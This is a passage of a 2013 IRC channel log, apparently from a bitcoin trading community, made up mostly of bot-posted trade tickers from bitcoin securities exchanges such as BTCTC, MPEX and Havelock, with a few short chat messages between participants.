04:58:02 which way are you wanting it to go ? Jul 27 05:02:02 [BTCTC] [DMS.SELLING] 126 @ 0.0209 = 2.6334 BTC [+] Jul 27 05:02:16 [MPEX] [S.MPOE] 11300 @ 0.00079584 = 8.993 BTC [+] Jul 27 05:02:18 [MPEX] [S.MPOE] 4850 @ 0.00079828 = 3.8717 BTC [+] Jul 27 05:03:10 [HAVELOCK] [SDSTM] 2 @ 0.00948898 = 0.019 BTC [+] Jul 27 05:03:40 [BTCTC] [TAT.ASICMINER] 75 @ 0.04469 = 3.3518 BTC [+] Jul 27 05:04:24 [BTCTC] [ACTIVEMINING] 150 @ 0.005487 = 0.8231 BTC [+] Jul 27 05:04:40 [BTCTC] [ACTIVEMINING] 24 @ 0.005486 = 0.1317 BTC [-] Jul 27 05:06:06 [BTCTC] [ACTIVEMINING] 1 @ 0.005486 BTC [-] Jul 27 05:07:09 [BTCTC] [ACTIVEMINING] 24 @ 0.005486 = 0.1317 BTC [-] Jul 27 05:07:36 [BTCTC] [ACTIVEMINING] 24 @ 0.005487 = 0.1317 BTC [+] Jul 27 05:07:53 [BTCTC] [ACTIVEMINING] 10 @ 0.005488 = 0.0549 BTC [+] Jul 27 05:16:17 ;;baratio Jul 27 05:16:18 Total bids: 13200792 USD. Total asks: 113891 BTC. Ratio: 115.90710 USD/BTC. | Data vintage: 0.0062 seconds Jul 27 05:18:54 [BTCTC] [ACTIVEMINING] 101 @ 0.005489 = 0.5544 BTC [+] Jul 27 05:19:38 [HAVELOCK] [SDSTM] 1 @ 0.00948898 BTC [+] Jul 27 05:19:40 [BTCTC] [ACTIVEMINING] 134 @ 0.005488 = 0.7354 BTC [-] Jul 27 05:19:41 [BTCTC] [ACTIVEMINING] 210 @ 0.005489 = 1.1527 BTC [+] Jul 27 05:19:43 [BTCTC] [ACTIVEMINING] 28 @ 0.005492 = 0.1538 BTC [+] Jul 27 05:19:44 [BTCTC] [ACTIVEMINING] 143 @ 0.005495 = 0.7858 BTC [+] Jul 27 05:19:46 [HAVELOCK] [SDSTM] 1 @ 0.0088 BTC [-] Jul 27 05:19:48 [BTCTC] [ACTIVEMINING] 100 @ 0.005499 = 0.5499 BTC [+] Jul 27 05:19:49 [BTCTC] [ACTIVEMINING] 200 @ 0.0055 = 1.1 BTC [+] Jul 27 05:19:51 [BTCTC] [ACTIVEMINING] 125 @ 0.005509 = 0.6886 BTC [+] Jul 27 05:19:52 [BTCTC] [ACTIVEMINING] 250 @ 0.00551 = 1.3775 BTC [+] Jul 27 05:19:52 [BTCTC] [ACTIVEMINING] 125 @ 0.005519 = 0.6899 BTC [+] Jul 27 05:19:53 [BTCTC] [ACTIVEMINING] 250 @ 0.00552 = 1.38 BTC [+] Jul 27 05:19:55 [BTCTC] [ACTIVEMINING] 150 @ 0.005529 = 0.8294 BTC [+] Jul 27 05:19:56 [BTCTC] [ACTIVEMINING] 300 @ 0.00553 = 1.659 BTC [+] Jul 27 05:19:57 [BTCTC] [ACTIVEMINING] 310 @ 0.005555 = 1.7221 BTC [+] Jul 27 05:19:58 [BTCTC] [ACTIVEMINING] 277 @ 0.0056 = 1.5512 BTC [+] Jul 27 05:20:20 [HAVELOCK] [AM100] 4 @ 0.04339888 = 0.1736 BTC [+] Jul 27 05:23:00 [BTCTC] [ACTIVEMINING] 25 @ 0.005599 = 0.14 BTC [-] Jul 27 05:23:02 [BTCTC] [ACTIVEMINING] 33 @ 0.0056 = 0.1848 BTC [+] Jul 27 05:23:03 [BTCTC] [ACTIVEMINING] 9 @ 0.005692 = 0.0512 BTC [+] Jul 27 05:23:05 [BTCTC] [ACTIVEMINING] 9 @ 0.005695 = 0.0513 BTC [+] Jul 27 05:24:05 [BTCTC] [ACTIVEMINING] 50 @ 0.005698 = 0.2849 BTC [+] Jul 27 05:25:20 [BTCTC] [ACTIVEMINING] 25 @ 0.005698 = 0.1425 BTC [+] Jul 27 05:25:58 [BTCTC] [ACTIVEMINING] 25 @ 0.005698 = 0.1425 BTC [+] Jul 27 05:26:06 [BTCTC] [ACTIVEMINING] 100 @ 0.005698 = 0.5698 BTC [+] Jul 27 05:27:25 [BTCTC] [ACTIVEMINING] 25 @ 0.005601 = 0.14 BTC [-] Jul 27 05:27:27 [BTCTC] [ACTIVEMINING] 175 @ 0.0056 = 0.98 BTC [-] Jul 27 05:27:56 [BTCTC] [ACTIVEMINING] 25 @ 0.005699 = 0.1425 BTC [+] Jul 27 05:27:58 [BTCTC] [ACTIVEMINING] 23 @ 0.0057 = 0.1311 BTC [+] Jul 27 05:29:32 [BTCTC] [ACTIVEMINING] 2 @ 0.0057 = 0.0114 BTC [+] Jul 27 05:29:40 [BTCTC] [ACTIVEMINING] 72 @ 0.0057 = 0.4104 BTC [+] Jul 27 05:29:42 [BTCTC] [ACTIVEMINING] 19 @ 0.00573 = 0.1089 BTC [+] Jul 27 05:29:44 [BTCTC] [ACTIVEMINING] 240 @ 0.005739 = 1.3774 BTC [+] Jul 27 05:29:44 [BTCTC] [ACTIVEMINING] 25 @ 0.005739 = 0.1435 BTC [+] Jul 27 05:29:46 [BTCTC] [ACTIVEMINING] 444 @ 0.00575 = 2.553 BTC [+] Jul 27 05:30:41 [BTCTC] [ACTIVEMINING] 289 @ 0.00575 = 1.6618 BTC [+] Jul 27 05:31:02 [BTCTC] [KENILWORTH] 1877 @ 0.0018 = 3.3786 BTC [+] Jul 27 05:31:52 [BTCTC] [ACTIVEMINING] 200 @ 0.00576 = 1.152 BTC [+] Jul 27 05:36:16 [BTCTC] [ACTIVEMINING] 500 @ 0.0058 = 2.9 BTC [+] Jul 27 05:38:45 [BTCTC] [ACTIVEMINING] 50 @ 0.005808 = 0.2904 BTC [+] Jul 27 05:38:47 [BTCTC] [ACTIVEMINING] 50 @ 0.005808 = 0.2904 BTC [+] Jul 27 05:38:49 [BTCTC] [ACTIVEMINING] 126 @ 0.005835 = 0.7352 BTC [+] Jul 27 05:38:50 [BTCTC] [ACTIVEMINING] 49 @ 0.00585 = 0.2867 BTC [+] Jul 27 05:38:52 [BTCTC] [ACTIVEMINING] 50 @ 0.00588 = 0.294 BTC [+] Jul 27 05:38:53 [BTCTC] [ACTIVEMINING] 1500 @ 0.0059 = 8.85 BTC [+] Jul 27 05:38:55 [BTCTC] [ACTIVEMINING] 300 @ 0.005901 = 1.7703 BTC [+] Jul 27 05:39:04 [BTCTC] [ACTIVEMINING] 5 @ 0.005804 = 0.029 BTC [-] Jul 27 05:44:23 [BTCTC] [BASIC-MINING] 1 @ 0.5373 BTC [+] Jul 27 05:50:19 [BTCTC] [ACTIVEMINING] 25 @ 0.005607 = 0.1402 BTC [-] Jul 27 05:50:39 [BTCTC] [ACTIVEMINING] 50 @ 0.005608 = 0.2804 BTC [+] Jul 27 05:54:07 [BTCTC] [ACTIVEMINING] 25 @ 0.005751 = 0.1438 BTC [+] Jul 27 05:54:43 [BTCTC] [ACTIVEMINING] 25 @ 0.005751 = 0.1438 BTC [+] Jul 27 05:55:13 [BTCTC] [ACTIVEMINING] 25 @ 0.005801 = 0.145 BTC [+] Jul 27 05:55:16 [BTCTC] [ACTIVEMINING] 29 @ 0.0058 = 0.1682 BTC [-] Jul 27 05:55:26 [BTCTC] [ACTIVEMINING] 1 @ 0.005945 BTC [+] Jul 27 05:55:41 [BTCTC] [ACTIVEMINING] 50 @ 0.005752 = 0.2876 BTC [-] Jul 27 05:56:07 [BTCTC] [ACTIVEMINING] 2750 @ 0.00575 = 15.8125 BTC [-] Jul 27 05:56:35 [BTCTC] [ACTIVEMINING] 728 @ 0.00565 = 4.1132 BTC [-] Jul 27 05:56:39 [BTCTC] [ACTIVEMINING] 492 @ 0.00565 = 2.7798 BTC [-] Jul 27 06:00:29 [BTCTC] [ACTIVEMINING] 25 @ 0.005649 = 0.1412 BTC [-] Jul 27 06:01:03 [BTCTC] [ACTIVEMINING] 25 @ 0.005649 = 0.1412 BTC [-] Jul 27 06:01:05 [BTCTC] [ACTIVEMINING] 728 @ 0.00565 = 4.1132 BTC [+] Jul 27 06:03:05 [HAVELOCK] [HIM] 4 @ 0.21 = 0.84 BTC [+] Jul 27 06:03:15 [BTCTC] [TAT.ASICMINER] 27 @ 0.04469 = 1.2066 BTC [+] Jul 27 06:04:14 [BTCTC] [BFMINES] 60 @ 0.003021 = 0.1813 BTC [-] Jul 27 06:04:26 [BTCTC] [TAT.ASICMINER] 12 @ 0.0447 = 0.5364 BTC [+] Jul 27 06:04:30 [BTCTC] [BFMINES] 1 @ 0.00302 BTC [-] Jul 27 06:04:56 [BTCTC] [BFMINES] 4 @ 0.003 = 0.012 BTC [-] Jul 27 06:07:34 [BTCTC] [ACTIVEMINING] 1 @ 0.005943 BTC [+] Jul 27 06:13:22 [BTCTC] [ACTIVEMINING] 17 @ 0.005942 = 0.101 BTC [-] Jul 27 06:15:22 [BTCTC] [ACTIVEMINING] 25 @ 0.005942 = 0.1486 BTC [-] Jul 27 06:16:00 [BTCTC] [ACTIVEMINING] 14 @ 0.005943 = 0.0832 BTC [+] Jul 27 06:16:04 [MPEX] [S.MPOE] 5400 @ 0.00080079 = 4.3243 BTC [+] Jul 27 06:18:24 [BTCTC] [ACTIVEMINING] 200 @ 0.005947 = 1.1894 BTC [+] Jul 27 06:19:00 [BTCTC] [KENILWORTH] 300 @ 0.0018 = 0.54 BTC [+] Jul 27 06:19:46 [BTCTC] [ACTIVEMINING] 1 @ 0.005948 BTC [+] Jul 27 06:21:47 [BTCTC] [TAT.MINIGAME] 36 @ 0.000275 = 0.0099 BTC [+] Jul 27 06:27:59 [BTCTC] [ASICMINER-PT] 1 @ 4.569 BTC [+] Jul 27 06:31:17 PT dividend paid Jul 27 06:31:31 [BTCTC] [BASIC-MINING] 5 @ 0.5001 = 2.5005 BTC [-] Jul 27 06:32:03 [BTCTC] [ACTIVEMINING] 50 @ 0.005947 = 0.2974 BTC [-] Jul 27 06:36:30 [BTCTC] [BASIC-MINING] 3 @ 0.5 = 1.5 BTC [-] Jul 27 06:38:33 [BTCTC] [BASIC-MINING] 2 @ 0.5 = 1 BTC [-] Jul 27 06:39:01 [BTCTC] [ACTIVEMINING] 36 @ 0.005943 = 0.2139 BTC [-] Jul 27 06:39:06 [BTCTC] [ACTIVEMINING] 47 @ 0.005944 = 0.2794 BTC [+] Jul 27 06:41:17 [BTCTC] [ACTIVEMINING] 11 @ 0.005943 = 0.0654 BTC [-] Jul 27 06:51:18 [BTCTC] [ACTIVEMINING] 116 @ 0.005942 = 0.6893 BTC [-] Jul 27 06:51:35 [BTCTC] [ACTIVEMINING] 25 @ 0.005851 = 0.1463 BTC [-] Jul 27 06:51:37 [BTCTC] [ACTIVEMINING] 25 @ 0.00585 = 0.1463 BTC [-] Jul 27 06:53:19 [BTCTC] [ACTIVEMINING] 25 @ 0.005851 = 0.1463 BTC [+] Jul 27 06:53:21 [BTCTC] [ACTIVEMINING] 25 @ 0.00585 = 0.1463 BTC [-] Jul 27 06:56:41 [BTCTC] [ACTIVEMINING] 25 @ 0.005853 = 0.1463 BTC [+] Jul 27 06:56:43 [BTCTC] [ACTIVEMINING] 37 @ 0.005852 = 0.2165 BTC [-] Jul 27 06:56:53 [MPEX] [S.MPOE] 1750 @ 0.00080004 = 1.4001 BTC [-] Jul 27 06:56:57 [MPEX] [S.MPOE] 6100 @ 0.00079803 = 4.868 BTC [-] Jul 27 06:58:42 [BTCTC] [ACTIVEMINING] 227 @ 0.005851 = 1.3282 BTC [-] Jul 27 07:06:00 [BTCTC] [ACTIVEMINING] 500 @ 0.0059 = 2.95 BTC [+] Jul 27 07:10:31 [BTCTC] [ACTIVEMINING] 37 @ 0.005928 = 0.2193 BTC [+] Jul 27 07:11:50 [BTCTC] [ACTIVEMINING] 1000 @ 0.0059 = 5.9 BTC [-] Jul 27 07:11:52 [BTCTC] [ACTIVEMINING] 1000 @ 0.00593 = 5.93 BTC [+] Jul 27 07:14:22 [BTCTC] [ACTIVEMINING] 25 @ 0.005857 = 0.1464 BTC [-] Jul 27 07:14:24 [BTCTC] [ACTIVEMINING] 12 @ 0.005856 = 0.0703 BTC [-] Jul 27 07:14:24 [BTCTC] [ACTIVEMINING] 75 @ 0.005855 = 0.4391 BTC [-] Jul 27 07:14:26 [BTCTC] [ACTIVEMINING] 100 @ 0.005854 = 0.5854 BTC [-] Jul 27 07:14:28 [BTCTC] [ACTIVEMINING] 50 @ 0.00585 = 0.2925 BTC [-] Jul 27 07:18:43 [BTCTC] [ACTIVEMINING] 9 @ 0.005799 = 0.0522 BTC [-] Jul 27 07:18:45 [BTCTC] [ACTIVEMINING] 38 @ 0.0058 = 0.2204 BTC [+] Jul 27 07:18:46 [BTCTC] [ACTIVEMINING] 353 @ 0.0059 = 2.0827 BTC [+] Jul 27 07:21:32 [BTCTC] [ACTIVEMINING] 50 @ 0.005775 = 0.2888 BTC [-] Jul 27 07:24:23 [BTCTC] [TAT.ASICMINER] 76 @ 0.0447 = 3.3972 BTC [+] Jul 27 07:26:15 [MPEX] [S.MPOE] 5916 @ 0.0007941 = 4.6979 BTC [-] Jul 27 07:26:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.0447 = 0.447 BTC [+] Jul 27 07:27:16 [BTCTC] [ACTIVEMINING] 340 @ 0.005776 = 1.9638 BTC [+] Jul 27 07:27:18 [BTCTC] [ACTIVEMINING] 100 @ 0.005776 = 0.5776 BTC [+] Jul 27 07:28:28 [BTCTC] [DMS.SELLING] 63 @ 0.02098 = 1.3217 BTC [+] Jul 27 07:29:11 ThickAsThieves: oompa Jul 27 07:29:17 [BTCTC] [ACTIVEMINING] 500 @ 0.005775 = 2.8875 BTC [-] Jul 27 07:30:34 loompa Jul 27 07:35:53 [BTCTC] [ACTIVEMINING] 3 @ 0.005774 = 0.0173 BTC [-] Jul 27 07:35:55 [BTCTC] [ACTIVEMINING] 34 @ 0.005774 = 0.1963 BTC [-] Jul 27 07:39:43 [BTCTC] [ACTIVEMINING] 25 @ 0.005884 = 0.1471 BTC [+] Jul 27 07:39:44 [BTCTC] [ACTIVEMINING] 50 @ 0.005885 = 0.2943 BTC [+] Jul 27 07:39:46 [BTCTC] [ACTIVEMINING] 95 @ 0.005887 = 0.5593 BTC [+] Jul 27 07:40:25 [MPEX] [S.MPOE] 3434 @ 0.0007941 = 2.7269 BTC [-] Jul 27 07:45:27 [BTCTC] [DMS.MINING] 7 @ 0.0125 = 0.0875 BTC [-] Jul 27 07:46:28 [BTCTC] [DMS.MINING] 9 @ 0.0125 = 0.1125 BTC [-] Jul 27 07:53:55 [BTCTC] [ACTIVEMINING] 25 @ 0.005783 = 0.1446 BTC [-] Jul 27 07:53:57 [BTCTC] [ACTIVEMINING] 37 @ 0.005782 = 0.2139 BTC [-] Jul 27 07:53:59 [BTCTC] [ACTIVEMINING] 41 @ 0.005777 = 0.2369 BTC [-] Jul 27 07:54:01 [BTCTC] [ACTIVEMINING] 50 @ 0.005776 = 0.2888 BTC [-] Jul 27 07:54:19 [BTCTC] [ACTIVEMINING] 6 @ 0.005773 = 0.0346 BTC [-] Jul 27 07:54:21 [BTCTC] [ACTIVEMINING] 50 @ 0.005701 = 0.2851 BTC [-] Jul 27 07:54:23 [BTCTC] [ACTIVEMINING] 300 @ 0.0057 = 1.71 BTC [-] Jul 27 07:54:25 [BTCTC] [ACTIVEMINING] 45 @ 0.005651 = 0.2543 BTC [-] Jul 27 07:54:27 [BTCTC] [ACTIVEMINING] 90 @ 0.00565 = 0.5085 BTC [-] Jul 27 07:54:27 [BTCTC] [ACTIVEMINING] 38 @ 0.005408 = 0.2055 BTC [-] Jul 27 07:54:29 [BTCTC] [ACTIVEMINING] 73 @ 0.005407 = 0.3947 BTC [-] Jul 27 07:54:31 [BTCTC] [ACTIVEMINING] 3 @ 0.005405 = 0.0162 BTC [-] Jul 27 07:54:33 [BTCTC] [ACTIVEMINING] 50 @ 0.005403 = 0.2702 BTC [-] Jul 27 07:54:34 [BTCTC] [ACTIVEMINING] 50 @ 0.005402 = 0.2701 BTC [-] Jul 27 07:54:36 [BTCTC] [ACTIVEMINING] 50 @ 0.0054 = 0.27 BTC [-] Jul 27 07:54:38 [BTCTC] [ACTIVEMINING] 446 @ 0.005395 = 2.4062 BTC [-] Jul 27 07:54:40 [BTCTC] [ACTIVEMINING] 647 @ 0.005394 = 3.4899 BTC [-] Jul 27 07:56:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00316 BTC [+] Jul 27 07:56:42 [BTCTC] [TAT.VIRTUALMINE] 344 @ 0.003298 = 1.1345 BTC [+] Jul 27 07:58:49 [BTCTC] [TAT.VIRTUALMINE] 472 @ 0.003309 = 1.5618 BTC [+] Jul 27 07:58:51 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.00331 = 0.993 BTC [+] Jul 27 08:01:20 [BTCTC] [TAT.VIRTUALMINE] 193 @ 0.003334 = 0.6435 BTC [+] Jul 27 08:01:24 [BTCTC] [GSDPT] 934 @ 0.00338 = 3.1569 BTC [-] Jul 27 08:01:25 [BTCTC] [GSDPT] 5407 @ 0.003312 = 17.908 BTC [-] Jul 27 08:01:26 [BTCTC] [ACTIVEMINING] 50 @ 0.0054 = 0.27 BTC [+] Jul 27 08:01:29 [BTCTC] [ACTIVEMINING] 122 @ 0.005397 = 0.6584 BTC [-] Jul 27 08:01:43 [BTCTC] [ACTIVEMINING] 50 @ 0.005397 = 0.2699 BTC [-] Jul 27 08:02:37 [BTCTC] [ACTIVEMINING] 245 @ 0.005394 = 1.3215 BTC [-] Jul 27 08:03:19 [BTCTC] [ACTIVEMINING] 250 @ 0.005351 = 1.3378 BTC [-] Jul 27 08:03:35 [BTCTC] [ASICMINER-PT] 2 @ 4.55 = 9.1 BTC [-] Jul 27 08:03:47 [BTCTC] [ACTIVEMINING] 500 @ 0.00535 = 2.675 BTC [-] Jul 27 08:04:19 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003333 = 0.3333 BTC [-] Jul 27 08:04:21 [BTCTC] [TAT.VIRTUALMINE] 207 @ 0.003334 = 0.6901 BTC [+] Jul 27 08:04:54 [BTCTC] [ACTIVEMINING] 4000 @ 0.0053 = 21.2 BTC [-] Jul 27 08:05:31 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003334 = 0.3334 BTC [+] Jul 27 08:08:41 [BTCTC] [BASIC-MINING] 2 @ 0.5101 = 1.0202 BTC [+] Jul 27 08:15:28 [HAVELOCK] [AM100] 5 @ 0.0433899 = 0.2169 BTC [-] Jul 27 08:16:22 [BTCTC] [ACTIVEMINING] 125 @ 0.005625 = 0.7031 BTC [+] Jul 27 08:16:48 [WTB] 5.6 BTC for $500 moneypak. Jul 27 08:19:13 [BTCTC] [DMS.MINING] 10 @ 0.01289 = 0.1289 BTC [+] Jul 27 08:19:51 [HAVELOCK] [SDSTM] 1 @ 0.00948898 BTC [+] Jul 27 08:20:09 [HAVELOCK] [AM100] 20 @ 0.0433899 = 0.8678 BTC [-] Jul 27 08:22:41 [HAVELOCK] [SMG] 400 @ 0.0002699 = 0.108 BTC [-] Jul 27 08:23:13 [HAVELOCK] [SDSTM] 4 @ 0.00948898 = 0.038 BTC [+] Jul 27 08:23:32 [HAVELOCK] [SDSTM] 1 @ 0.0096 BTC [+] Jul 27 08:26:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.0447 = 0.1341 BTC [+] Jul 27 08:27:58 [BTCTC] [GSDPT] 1 @ 0.00348 BTC [+] Jul 27 08:28:29 [HAVELOCK] [SDSTM] 1 @ 0.0096 BTC [+] Jul 27 08:28:52 [BTCTC] [GSDPT] 8 @ 0.00348 = 0.0278 BTC [+] Jul 27 08:29:45 [HAVELOCK] [SMG] 350 @ 0.00026999 = 0.0945 BTC [+] Jul 27 08:31:40 [BTCTC] [BITVPS] 45 @ 0.001995 = 0.0898 BTC [+] Jul 27 08:32:57 [BTCTC] [COGNITIVE] 1 @ 0.7099 BTC [+] Jul 27 08:33:32 [BTCTC] [ASICMINER-PT] 5 @ 4.55 = 22.75 BTC [-] Jul 27 08:34:16 [BTCTC] [ASICMINER-PT] 2 @ 4.542 = 9.084 BTC [-] Jul 27 08:34:51 Cusipzzz why? Jul 27 08:35:34 [BTCTC] [ASICMINER-PT] 1 @ 4.53 BTC [-] Jul 27 08:35:36 [BTCTC] [ASICMINER-PT] 1 @ 4.516 BTC [-] Jul 27 08:35:38 [BTCTC] [ASICMINER-PT] 3 @ 4.515 = 13.545 BTC [-] Jul 27 08:35:41 [BTCTC] [ASICMINER-PT] 1 @ 4.512 BTC [-] Jul 27 08:35:43 [BTCTC] [ASICMINER-PT] 1 @ 4.511 BTC [-] Jul 27 08:35:58 [BTCTC] [ASICMINER-PT] 1 @ 4.51 BTC [-] Jul 27 08:36:03 [BTCTC] [ASICMINER-PT] 2 @ 4.503 = 9.006 BTC [-] Jul 27 08:36:10 [BTCTC] [ASICMINER-PT] 4 @ 4.502 = 18.008 BTC [-] Jul 27 08:36:28 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [-] Jul 27 08:36:31 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [-] Jul 27 08:36:32 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [-] Jul 27 08:36:58 [BTCTC] [ACTIVEMINING] 2 @ 0.005587 = 0.0112 BTC [-] Jul 27 08:38:38 [BTCTC] [ASICMINER-PT] 1 @ 4.48 BTC [-] Jul 27 08:38:40 [BTCTC] [ASICMINER-PT] 5 @ 4.48 = 22.4 BTC [-] Jul 27 08:39:20 [BTCTC] [TAT.ASICMINER] 11 @ 0.0447 = 0.4917 BTC [+] Jul 27 08:39:51 [BTCTC] [TAT.MINIGAME] 1 @ 0.000275 BTC [+] Jul 27 08:41:16 [BTCTC] [KENILWORTH] 1870 @ 0.0018 = 3.366 BTC [+] Jul 27 08:42:17 [BTCTC] [ASICMINER-PT] 5 @ 4.471 = 22.355 BTC [-] Jul 27 08:42:19 [BTCTC] [ASICMINER-PT] 1 @ 4.452 BTC [-] Jul 27 08:42:21 [BTCTC] [ASICMINER-PT] 1 @ 4.451 BTC [-] Jul 27 08:42:23 [BTCTC] [ASICMINER-PT] 1 @ 4.451 BTC [-] Jul 27 08:42:24 [BTCTC] [ASICMINER-PT] 3 @ 4.45 = 13.35 BTC [-] Jul 27 08:44:07 What makes you say that Jul 27 08:44:34 I see Jul 27 08:47:15 [BTCTC] [ASICMINER-PT] 1 @ 4.549 BTC [+] Jul 27 08:48:35 [BTCTC] [BFMINES] 1 @ 0.003883 BTC [+] Jul 27 08:48:37 [BTCTC] [BFMINES] 81 @ 0.003884 = 0.3146 BTC [+] Jul 27 08:51:30 Well I sold off all my am at 5 sometime ago to buy into AMC Jul 27 08:53:47 [BTCTC] [BMF] 3 @ 0.041 = 0.123 BTC [+] Jul 27 08:56:03 [BTCTC] [ACTIVEMINING] 60 @ 0.005322 = 0.3193 BTC [-] Jul 27 08:56:05 [BTCTC] [ACTIVEMINING] 50 @ 0.005312 = 0.2656 BTC [-] Jul 27 08:56:07 [BTCTC] [ACTIVEMINING] 270 @ 0.005311 = 1.434 BTC [-] Jul 27 08:56:10 [BTCTC] [ACTIVEMINING] 540 @ 0.00531 = 2.8674 BTC [-] Jul 27 08:56:18 [BTCTC] [ACTIVEMINING] 52 @ 0.00531 = 0.2761 BTC [-] Jul 27 08:56:20 [BTCTC] [ACTIVEMINING] 5 @ 0.005305 = 0.0265 BTC [-] Jul 27 08:56:22 [BTCTC] [ACTIVEMINING] 150 @ 0.005301 = 0.7952 BTC [-] Jul 27 08:56:24 [BTCTC] [ACTIVEMINING] 300 @ 0.0053 = 1.59 BTC [-] Jul 27 08:56:26 [BTCTC] [ACTIVEMINING] 100 @ 0.00527 = 0.527 BTC [-] Jul 27 08:56:28 [BTCTC] [ACTIVEMINING] 10 @ 0.005262 = 0.0526 BTC [-] Jul 27 08:56:30 [BTCTC] [ACTIVEMINING] 50 @ 0.005261 = 0.2631 BTC [-] Jul 27 08:56:32 [BTCTC] [ACTIVEMINING] 10 @ 0.0052 = 0.052 BTC [-] Jul 27 08:56:33 [BTCTC] [ACTIVEMINING] 1050 @ 0.0052 = 5.46 BTC [-] Jul 27 08:56:35 [BTCTC] [ACTIVEMINING] 20 @ 0.005165 = 0.1033 BTC [-] Jul 27 08:56:37 [BTCTC] [ACTIVEMINING] 50 @ 0.005102 = 0.2551 BTC [-] Jul 27 08:56:39 [BTCTC] [ACTIVEMINING] 50 @ 0.005101 = 0.2551 BTC [-] Jul 27 08:56:39 [BTCTC] [ACTIVEMINING] 25 @ 0.0051 = 0.1275 BTC [-] Jul 27 08:56:41 [BTCTC] [ACTIVEMINING] 25 @ 0.0051 = 0.1275 BTC [-] Jul 27 08:56:43 [BTCTC] [ACTIVEMINING] 50 @ 0.00506 = 0.253 BTC [-] Jul 27 08:56:45 [BTCTC] [ACTIVEMINING] 388 @ 0.005052 = 1.9602 BTC [-] Jul 27 08:56:46 [BTCTC] [ACTIVEMINING] 70 @ 0.005001 = 0.3501 BTC [-] Jul 27 08:56:48 [BTCTC] [ACTIVEMINING] 25 @ 0.005 = 0.125 BTC [-] Jul 27 08:56:49 [BTCTC] [ACTIVEMINING] 24 @ 0.005 = 0.12 BTC [-] Jul 27 08:56:51 [BTCTC] [ACTIVEMINING] 198 @ 0.005 = 0.99 BTC [-] Jul 27 08:56:52 [BTCTC] [ACTIVEMINING] 40 @ 0.005 = 0.2 BTC [-] Jul 27 08:56:54 [BTCTC] [ACTIVEMINING] 15 @ 0.005 = 0.075 BTC [-] Jul 27 08:56:54 [BTCTC] [ACTIVEMINING] 873 @ 0.005 = 4.365 BTC [-] Jul 27 08:57:25 [BTCTC] [ACTIVEMINING] 1127 @ 0.005 = 5.635 BTC [-] Jul 27 08:59:01 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003334 = 0.01 BTC [+] Jul 27 08:59:21 [BTCTC] [TAT.ASICMINER] 38 @ 0.0447 = 1.6986 BTC [+] Jul 27 08:59:23 [BTCTC] [TAT.ASICMINER] 35 @ 0.045 = 1.575 BTC [+] Jul 27 08:59:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.0452 = 0.0904 BTC [+] Jul 27 08:59:27 [BTCTC] [TAT.ASICMINER] 5 @ 0.04526 = 0.2263 BTC [+] Jul 27 08:59:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.04526 BTC [+] Jul 27 09:07:47 [BTCTC] [TAT.VIRTUALMINE] 78 @ 0.003334 = 0.2601 BTC [+] Jul 27 09:08:35 [HAVELOCK] [SMG] 120 @ 0.00026999 = 0.0324 BTC [+] Jul 27 09:09:00 [BTCTC] [TAT.VIRTUALMINE] 19 @ 0.003335 = 0.0634 BTC [+] Jul 27 09:09:14 [BTCTC] [LTC-ATF.B2] 1 @ 0.01015 BTC [-] Jul 27 09:10:45 [BTCTC] [BTC-BOND] 1 @ 0.00993 BTC [-] Jul 27 09:14:37 [HAVELOCK] [SMG] 264 @ 0.00026999 = 0.0713 BTC [+] Jul 27 09:15:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.04526 = 0.2263 BTC [+] Jul 27 09:17:00 [BTCTC] [ASICMINER-PT] 1 @ 4.437 BTC [-] Jul 27 09:24:18 [BTCTC] [BMF] 5 @ 0.0391 = 0.1955 BTC [-] Jul 27 09:24:22 [BTCTC] [BMF] 10 @ 0.039 = 0.39 BTC [-] Jul 27 09:28:11 [HAVELOCK] [SDSTM] 3 @ 0.0096 = 0.0288 BTC [+] Jul 27 09:28:13 [HAVELOCK] [SDSTM] 5 @ 0.0097 = 0.0485 BTC [+] Jul 27 09:29:36 [HAVELOCK] [SDSTM] 2 @ 0.00948898 = 0.019 BTC [-] Jul 27 09:31:23 [HAVELOCK] [SMG] 4 @ 0.0002699 = 0.0011 BTC [-] Jul 27 09:31:43 [BTCTC] [ASICMINER-PT] 1 @ 4.536 BTC [+] Jul 27 09:31:50 [BTCTC] [ASICMINER-PT] 9 @ 4.539 = 40.851 BTC [+] Jul 27 09:32:02 [BTCTC] [ASICMINER-PT] 20 @ 4.54 = 90.8 BTC [+] Jul 27 09:40:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.04499 BTC [-] Jul 27 09:42:31 [BTCTC] [ASICMINER-PT] 10 @ 4.57 = 45.7 BTC [+] Jul 27 09:42:33 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [+] Jul 27 09:42:35 [BTCTC] [ASICMINER-PT] 1 @ 4.608 BTC [+] Jul 27 09:42:38 [BTCTC] [ASICMINER-PT] 18 @ 4.609 = 82.962 BTC [+] **** BEGIN LOGGING AT Sat Jul 27 17:04:58 2013 Jul 27 17:05:50 sooo, what's new. Jul 27 17:08:01 [BTCTC] [ACTIVEMINING] 6 @ 0.005684 = 0.0341 BTC [-] Jul 27 17:08:04 pankkake: 391 hours Jul 27 17:08:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.04473 = 0.2237 BTC [-] Jul 27 17:08:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.04462 = 0.2231 BTC [-] Jul 27 17:08:17 [BTCTC] [TAT.ASICMINER] 20 @ 0.04456 = 0.8912 BTC [-] Jul 27 17:08:17 still, only 16 days =/ Jul 27 17:08:19 [BTCTC] [TAT.ASICMINER] 7 @ 0.04456 = 0.3119 BTC [-] Jul 27 17:08:35 of music? Jul 27 17:08:39 yeah Jul 27 17:08:43 DB Play Time: 301 days, 19:37:12 Jul 27 17:08:47 mircea_popescu: "Revenue from other fees" is wrong satoshi digits again? Jul 27 17:08:52 needless to say, I haven't listened to it all Jul 27 17:09:05 FabianB nope, that's a different caption Jul 27 17:09:14 pankkake: ha ha damnit Jul 27 17:09:15 actually you can verify it in 